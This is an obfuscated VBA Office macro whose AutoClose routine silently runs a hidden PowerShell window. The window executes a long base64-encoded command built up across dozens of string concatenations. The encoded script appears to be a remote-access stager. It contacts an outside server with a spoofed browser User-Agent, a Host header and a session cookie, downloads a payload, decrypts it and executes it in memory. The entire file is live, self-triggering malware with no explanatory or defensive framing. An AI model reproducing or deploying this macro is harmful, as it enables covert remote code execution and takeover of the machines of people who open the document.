Sub AutoClose()
	bQgReYKshGggJR
End Sub

Public Function bQgReYKshGggJR() As Variant
	Dim tMfKowsPRekX As String
	tMfKowsPRekX = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	tMfKowsPRekX = tMfKowsPRekX + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	tMfKowsPRekX = tMfKowsPRekX + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AF"
	tMfKowsPRekX = tMfKowsPRekX + "sAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUA"
	tMfKowsPRekX = tMfKowsPRekX + "UABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQ"
	tMfKowsPRekX = tMfKowsPRekX + "BjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQASwA9"
	tMfKowsPRekX = tMfKowsPRekX + "AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAG"
	tMfKowsPRekX = tMfKowsPRekX + "kAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUA"
	tMfKowsPRekX = tMfKowsPRekX + "cwAoACcASQB2AFYAXgBZADoARgB0AGYAQwBYAFQALAA9AGEAQQ"
	tMfKowsPRekX = tMfKowsPRekX + "BNAD8AagAjADcATwBRAHAAXQAmAHIAfABbAFoAeABuACcAKQA7"
	tMfKowsPRekX = tMfKowsPRekX + "ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD"
	tMfKowsPRekX = tMfKowsPRekX + "0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoA"
	tMfKowsPRekX = tMfKowsPRekX + "PQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJA"
	tMfKowsPRekX = tMfKowsPRekX + "BLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABf"
	tMfKowsPRekX = tMfKowsPRekX + "AF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAF"
	tMfKowsPRekX = tMfKowsPRekX + "sAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEA"
	tMfKowsPRekX = tMfKowsPRekX + "KQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQ"
	tMfKowsPRekX = tMfKowsPRekX + "ApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABd"
	tMfKowsPRekX = tMfKowsPRekX + "AD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAG"
	tMfKowsPRekX = tMfKowsPRekX + "IAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQA"
	tMfKowsPRekX = tMfKowsPRekX + "SABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAD0ATgBlAHcALQ"
	tMfKowsPRekX = tMfKowsPRekX + "BPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBX"
	tMfKowsPRekX = tMfKowsPRekX + "AGUAYgBDAGwAaQBlAG4AdAA7ACQAcwBlAHIAPQAkACgAWwBUAG"
	tMfKowsPRekX = tMfKowsPRekX + "UAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMA"
	tMfKowsPRekX = tMfKowsPRekX + "bwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4Adg"
	tMfKowsPRekX = tMfKowsPRekX + "BlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdABy"
	tMfKowsPRekX = tMfKowsPRekX + "AGkAbgBnACgAJwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAE"
	tMfKowsPRekX = tMfKowsPRekX + "MAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEA"
	tMfKowsPRekX = tMfKowsPRekX + "TgBnAEEANABBAEMANABBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQ"
	tMfKowsPRekX = tMfKowsPRekX + "B5AEEARABnAEEATwBnAEEANABBAEQAQQBBACcAKQApACkAOwAk"
	tMfKowsPRekX = tMfKowsPRekX + "AHQAPQAnAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAaABlAG"
	tMfKowsPRekX = tMfKowsPRekX + "0AZQBzAC8AdwBwAF8AZABhAHQAYQAuAHAAaABwACcAOwAkAHcA"
	tMfKowsPRekX = tMfKowsPRekX + "YwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdA"
	tMfKowsPRekX = tMfKowsPRekX + "AuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1"
	tMfKowsPRekX = tMfKowsPRekX + "AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAH"
	tMfKowsPRekX = tMfKowsPRekX + "gAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMA"
	tMfKowsPRekX = tMfKowsPRekX + "eQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQ"
	tMfKowsPRekX = tMfKowsPRekX + "BsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0"
	tMfKowsPRekX = tMfKowsPRekX + "AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAG"
	tMfKowsPRekX = tMfKowsPRekX + "MAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAA"
	tMfKowsPRekX = tMfKowsPRekX + "cgBvAHgAeQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZA"
	tMfKowsPRekX = tMfKowsPRekX + "BkACgAIgBVAHMAZQByAC0AQQBnAGUAbgB0ACIALAAiAE0AbwB6"
	tMfKowsPRekX = tMfKowsPRekX + "AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE"
	tMfKowsPRekX = tMfKowsPRekX + "4AVAAgADYALgAzADsAIABXAGkAbgA2ADQAOwAgAHgANgA0ACkA"
	tMfKowsPRekX = tMfKowsPRekX + "IABBAHAAcABsAGUAVwBlAGIASwBpAHQALwA1ADMANwAuADMANg"
	tMfKowsPRekX = tMfKowsPRekX + "AgACgASwBIAFQATQBMACwAIABsAGkAawBlACAARwBlAGMAawBv"
	tMfKowsPRekX = tMfKowsPRekX + "ACkAIABDAGgAcgBvAG0AZQAvADcAOQAuADAALgAzADkANAA1AC"
	tMfKowsPRekX = tMfKowsPRekX + "4AOAA4ACAAUwBhAGYAYQByAGkALwA1ADMANwAuADMANgAiACkA"
	tMfKowsPRekX = tMfKowsPRekX + "OwB0AHIAeQB7ACQAaQBnAD0AJAB3AGMALgBEAG8AdwBuAGwAbw"
	tMfKowsPRekX = tMfKowsPRekX + "BhAGQARABhAHQAYQAoACQAcwBlAHIAKQB9AGMAYQB0AGMAaAB7"
	tMfKowsPRekX = tMfKowsPRekX + "AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoAC"
	tMfKowsPRekX = tMfKowsPRekX + "IASABvAHMAdAAiACwAIgB3AG0AdwBpAGYAYgBhAGoAeAB4AGIA"
	tMfKowsPRekX = tMfKowsPRekX + "YwB4AG0AdQBjAHgAbQBsAGMALgBjAG8AbQAiACkAOwAkAHcAYw"
	tMfKowsPRekX = tMfKowsPRekX + "AuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBp"
	tMfKowsPRekX = tMfKowsPRekX + "AGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHMAbwBIAHkAMAA5AE"
	tMfKowsPRekX = tMfKowsPRekX + "MANABLAHkARQBjAEUANgB5AHAAMAAxAFEASQB5ADMAMABWACUA"
	tMfKowsPRekX = tMfKowsPRekX + "MgBCAEMAMAAlADMARAAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYw"
	tMfKowsPRekX = tMfKowsPRekX + "AuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgAr"
	tMfKowsPRekX = tMfKowsPRekX + "ACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF"
	tMfKowsPRekX = tMfKowsPRekX + "0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAoACQA"
	tMfKowsPRekX = tMfKowsPRekX + "ZABhAHQAYQAuAGwAZQBuAGcAdABoAC0AMQApAF0AOwAtAGoAbw"
	tMfKowsPRekX = tMfKowsPRekX + "BpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABh"
	tMfKowsPRekX = tMfKowsPRekX + "AHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA"
	Set asd = CreateObject("WScript.Shell")
	asd.Run(tMfKowsPRekX)
End Function
